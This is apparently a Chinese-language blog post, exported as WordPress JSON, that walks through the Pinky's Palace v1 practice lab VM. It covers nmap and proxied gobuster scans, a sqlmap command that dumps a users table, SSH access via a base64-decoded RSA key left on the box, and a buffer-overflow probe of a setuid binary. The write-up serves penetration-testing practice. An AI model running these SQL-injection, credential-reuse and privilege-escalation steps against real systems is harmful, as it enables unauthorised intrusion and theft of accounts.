{"id":368,"date":"2024-05-10T18:08:54","date_gmt":"2024-05-10T10:08:54","guid":{"rendered":"http:\/\/xiyu12.top\/?p=368"},"modified":"2024-05-10T18:08:54","modified_gmt":"2024-05-10T10:08:54","slug":"pinkys-palace-v1","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=368","title":{"rendered":"PINKY&#8217;S PALACE: V1"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">\u4e00\u3001\u4fe1\u606f\u6536\u96c6<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo nmap -sT --min-rate 10000 -p- 192.168.56.3\nStarting Nmap 7.92 ( https:\/\/nmap.org ) at 2024-05-10 17:33 CST\nNmap scan report for pinkys-palace (192.168.56.3)\nHost is up (0.00030s latency).\nNot shown: 65532 closed tcp ports (conn-refused)\nPORT      STATE SERVICE\n8080\/tcp  open  http-proxy\n31337\/tcp open  Elite\n64666\/tcp open  unknown\nMAC Address: 08:00:27:A3:C5:2A (Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 4.84 seconds\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo nmap -sC -sV -p 8080,31337,64666  192.168.56.3\nStarting Nmap 7.92 ( https:\/\/nmap.org ) at 2024-05-10 17:33 CST\nNmap scan report for pinkys-palace (192.168.56.3)\nHost is up (0.00040s latency).\n\nPORT      STATE SERVICE    VERSION\n8080\/tcp  open  http       nginx 1.10.3\n|_http-server-header: nginx\/1.10.3\n|_http-title: 403 Forbidden\n31337\/tcp open  http-proxy Squid http proxy 3.5.23\n|_http-server-header: squid\/3.5.23\n|_http-title: ERROR: The requested URL could not be retrieved\n64666\/tcp open  ssh        OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 df:02:12:4f:4c:6d:50:27:6a:84:e9:0e:5b:65:bf:a0 (RSA)\n|   256 0a:ad:aa:c7:16:f7:15:07:f0:a8:50:23:17:f3:1c:2e (ECDSA)\n|_  256 4a:2d:e5:d8:ee:69:61:55:bb:db:af:29:4e:54:52:2f (ED25519)\nMAC Address: 08:00:27:A3:C5:2A (Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 27.05 seconds\n\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo nmap --script=vuln  -p 8080,31337,64666 192.168.56.3\nStarting Nmap 7.92 ( https:\/\/nmap.org ) at 2024-05-10 17:34 CST\nNmap scan report for pinkys-palace (192.168.56.3)\nHost is up (0.00041s latency).\n\nPORT      STATE SERVICE\n8080\/tcp  open  http-proxy\n31337\/tcp open  Elite\n64666\/tcp open  unknown\nMAC Address: 08:00:27:A3:C5:2A (Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 62.79 seconds\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">8080 nginx\/1.10.3   \u7f51\u9875<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Squid http proxy 3.5.23  \u4ee3\u7406\u670d\u52a1\u5668<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"> 64666 OpenSSH 7.4p1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbf\u95ee http:\/\/192.168.56.3:8080    <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">403 \u65e0\u6743\u9650\u8bbf\u95ee     \u5c1d\u8bd5\u8bbf\u95ee Web \u670d\u52a1\u5668\u4e0a\u7684\u4efb\u4f55\u9875\u9762\u90fd\u4f1a\u8fd4\u56de\u7981\u6b62\u54cd\u5e94\uff0c\u8fd9\u610f\u5473\u7740\u914d\u7f6e\u4e0d\u5141\u8bb8\u8fdc\u7a0b\u8bbf\u95ee\u5185\u5bb9<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-10-174053-1024x300.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-10-174053-1024x300.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-369\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u5bf9\u7f51\u9875\u8fdb\u884c\u76ee\u5f55\u626b\u63cf  <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528  192.168.56.3:8080  \u65e0\u6cd5\u8bbf\u95ee    \u4f7f\u7528127.0.0.1:8080   \u5f53\u505a\u672c\u5730\u8bbf\u95ee \u8ba9nignx \u653e\u8fc7<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-10-174550-1024x237.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-10-174550-1024x237.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-370\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>gobuster dir   --proxy http:\/\/192.168.56.3:31337  -u http:\/\/127.0.0.1:8080 --wordlist \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt  -x .txt,.php,.html               \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n&#91;+] Url:                     http:\/\/127.0.0.1:8080\n&#91;+] Method:                  GET\n&#91;+] Threads:                 10\n&#91;+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n&#91;+] Negative Status codes:   404\n&#91;+] Proxy:                   http:\/\/192.168.56.3:31337\n&#91;+] User Agent:              gobuster\/3.6\n&#91;+] Extensions:              php,html,txt\n&#91;+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html           (Status: 200) &#91;Size: 229]\n\/littlesecrets-main   (Status: 301) &#91;Size: 185] &#91;--> http:\/\/127.0.0.1:8080\/littlesecrets-main\/]\n<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e8c\u3001\u83b7\u5f97\u7acb\u8db3\u70b9<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728\u6d4f\u89c8\u5668\u5f00\u542f\u4ee3\u7406\u8bbf\u95ee\u7f51\u9875  http:\/\/127.0.0.1:8080\/littlesecrets-main\/<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-10-175542-1024x327.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-10-175542-1024x327.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-372\" style=\"width:840px;height:auto\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528sqlmap \u6d4b\u8bd5<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -u http:\/\/127.0.0.1:8080\/littlesecrets-main\/login.php --dbms=mysql --proxy=http:\/\/192.168.56.3:31337 --data=\"user=adm&amp;pass=passw\" -D pinky_sec_db  -T users -C user,pass --dump  --level=5 --risk=3\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">ssh pinkymanage@192.168.56.3 -p 64666  \u767b\u9646shell  \u83b7\u5f97\u7acb\u8db3\u70b9<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e09\u3001\u63d0\u6743<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>cd \/var\/www\/html\npinkymanage@pinkys-palace:\/var\/www\/html$ ls\nindex.html  littlesecrets-main\npinkymanage@pinkys-palace:\/var\/www\/html$ cd littlesecrets-main\/\npinkymanage@pinkys-palace:\/var\/www\/html\/littlesecrets-main$ ls\nindex.html login.php logs.php ultrasecretadminf1l35\npinkymanage@pinkys-palace:\/var\/www\/html\/littlesecrets-main$ cd ultrasecretadminf1l35\/\npinkymanage@pinkys-palace:\/var\/www\/html\/littlesecrets-main\/ultrasecretadminf1l35$ ls -al\ntotal 16\ndrwxr-xr-x 2 root root 4096 Feb  2  2018 .\ndrwxr-xr-x 3 root root 4096 Feb  2  2018 ..\n-rw-r--r-- 1 root root   99 Feb  2  2018 note.txt\n-rw-r--r-- 1 root root 2270 Feb  2  2018 .ultrasecret\ncat note.txt\nHmm just in case I get locked out of my server I put this rsa key here.. Nobody will find it heh..\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u83b7\u5f97\u4e00\u4e2assh \u7684\u5bc6\u94a5   \u9700\u8981base64  \u89e3\u7801<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cat .ultrasecret \ncat .ultrasecret | base64 -d  >>id\nchmod 600 id\n ssh -i id pinky@192.168.56.3 -p64666 <\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u767b\u9646shell  \u63d0\u6743\u5230pinky<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">pinky@pinkys-palace:~$ find \/ -perm \/4000 2&gt;\/dev\/null<br>\/bin\/umount<br>\/bin\/su<br>\/bin\/mount<br>\/bin\/ping<br>\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper<br>\/usr\/lib\/squid\/pinger<br>\/usr\/lib\/eject\/dmcrypt-get-device<br>\/usr\/lib\/openssh\/ssh-keysign<br>\/usr\/bin\/chsh<br>\/usr\/bin\/gpasswd<br>\/usr\/bin\/passwd<br>\/usr\/bin\/chfn<br>\/usr\/bin\/newgrp<br>\/usr\/bin\/sudo<br>\/home\/pinky\/adminhelper<br>pinky@pinkys-palace:~$ ls -al<br>total 44<br>drwx&#8212;&#8212; 3 pinky pinky 4096 Feb 2 2018 .<br>drwxr-xr-x 4 root root 4096 Feb 2 2018 ..<br>-rwsr-xr-x 1 root root 8880 Feb 2 2018 adminhelper<br>lrwxrwxrwx 1 root root 9 Feb 1 2018 .bash_history -&gt; \/dev\/null<br>-rw-r&#8211;r&#8211; 1 pinky pinky 220 Jan 28 2018 .bash_logout<br>-rw-r&#8211;r&#8211; 1 pinky pinky 3526 Jan 28 2018 .bashrc<br>lrwxrwxrwx 1 pinky pinky 9 Feb 1 2018 .mysql_history -&gt; \/dev\/null<br>-rw-r&#8211;r&#8211; 1 root root 280 Feb 2 2018 note.txt<br>-rw-r&#8211;r&#8211; 1 pinky pinky 675 Jan 28 2018 .profile<br>drwx&#8212;&#8212; 2 pinky pinky 4096 May 10 02:53 .ssh<br>-rw&#8212;&#8212;- 1 pinky pinky 1815 Feb 2 2018 .viminfo<br>pinky@pinkys-palace:~$<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6709\u4e00\u4e2a\u6267\u884c\u6587\u4ef6<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>pinky@pinkys-palace:~$ strings adminhelper \n\/lib64\/ld-linux-x86-64.so.2\nlibc.so.6\nstrcpy\nputs\nsetegid\nseteuid\nexecve\n__cxa_finalize\n__libc_start_main\n_ITM_deregisterTMCloneTable\n__gmon_start__\n_Jv_RegisterClasses\n_ITM_registerTMCloneTable\nGLIBC_2.2.5\n%b       \n=y       \n=9       \n52       \nAWAVA\nAUATL\n&#91;]A\\A]A^A_\n\/bin\/sh\n;*3$\"\nGCC: (Debian 6.3.0-18) 6.3.0 20170516\ncrtstuff.c\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u53d1\u73b0 strcpy   \u53ef\u80fd\u5b58\u5728  \u7f13\u51b2\u533a\u6ea2\u51fa<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>pinky@pinkys-palace:~$ .\/adminhelper $(python -c\"print('A'*200)\")\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nSegmentation fault<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u786e\u5b9a\u5b58\u5728 \u7f13\u51b2\u533a\u6ea2\u51fa<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4e00\u3001\u4fe1\u606f\u6536\u96c6 8080 nginx\/1.10.3 \u7f51\u9875 Squid http proxy 3.5.23 \u4ee3\u7406\u670d [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[49,83,87,115],"class_list":["post-368","post","type-post","status-publish","format-standard","hentry","category-target-aircraft","tag-nginx-403","tag-squid","tag-sshbase64","tag-115"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/368","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=368"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/368\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=368"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=368"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=368"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}